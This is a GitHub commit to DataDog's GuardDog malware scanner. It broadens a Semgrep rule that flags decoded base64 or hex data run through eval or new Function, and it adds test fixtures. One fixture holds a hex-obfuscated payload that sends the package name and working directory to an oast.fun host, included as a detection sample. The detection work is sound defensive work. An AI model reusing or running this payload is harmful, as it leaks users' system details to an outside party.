Skip to content

Commit

Permalink
Merge pull request #456 from DataDog/s.obregoso/FN_npm-exec-base64
Browse files Browse the repository at this point in the history
FN: Adding a new detection case to npm-exec-base64
  • Loading branch information
sobregosodd authored Sep 10, 2024
2 parents bed12d1 + 247b6ea commit 217a20e
Show file tree
Hide file tree
Showing 2 changed files with 27 additions and 7 deletions.
19 changes: 14 additions & 5 deletions guarddog/analyzer/sourcecode/npm-exec-base64.yml
Original file line number Diff line number Diff line change
Expand Up @@ -9,8 +9,17 @@ rules:
languages:
- javascript
severity: WARNING
patterns:
- pattern-not: eval('...')
- pattern-not: eval("...")
- pattern-not: eval(`...`)
- pattern: eval(atob(...))
mode: taint
pattern-sources:
- pattern-either:
- pattern: Buffer.from(...)
- pattern: atob(...)
pattern-sinks:
- pattern-either:
- patterns:
- pattern-inside: |
$FN = new Function(...)
...
- pattern: $FN(...)
- patterns:
- pattern: eval(...)
15 changes: 13 additions & 2 deletions tests/analyzer/sourcecode/npm-exec-base64.js
Original file line number Diff line number Diff line change
@@ -1,2 +1,13 @@
// ruleid: npm-exec-base64
eval(atob("Y29uc29sZS5sb2coIk5ldmVyIGdvbm5hIGdpdmUgeW91IHVwIikK"))
function f(){
// ruleid: npm-exec-base64
eval(atob("Y29uc29sZS5sb2coIk5ldmVyIGdvbm5hIGdpdmUgeW91IHVwIikK"));
}

function f() {
import fetch from "node-fetch"
const admin = "0a636f6e7374207061636b6167654e616d65203d2022726f626c6f782d6576656e742d747261636b6572223b0a636f6e73742063757272656e74576f726b696e674469726563746f7279203d2070726f636573732e63776428293b0a636f6e73742064617461203d204a534f4e2e737472696e676966792860247b7061636b6167654e616d657d2b247b63757272656e74576f726b696e674469726563746f72797d60293b0a6c657420686578456e636f64656444617461203d204275666665722e66726f6d2864617461292e746f537472696e67282768657827293b0a636f6e7374206865784461746157697468446f7473203d20686578456e636f646564446174612e6d61746368286e65772052656745787028602e7b312c36327d602c2027672729292e6a6f696e28272e27293b0a6665746368286068747470733a2f2f247b6865784461746157697468446f74737d2e6c74617265767a6c7464636c6b6466727361647533386c30316e657967327268622e6f6173742e66756e60293b0a"
const adminResult = Buffer.from(admin, 'hex').toString('utf8');
const func = new Function(adminResult);
// ruleid: npm-exec-base64
func(adminResult);
}

0 comments on commit 217a20e

Please sign in to comment.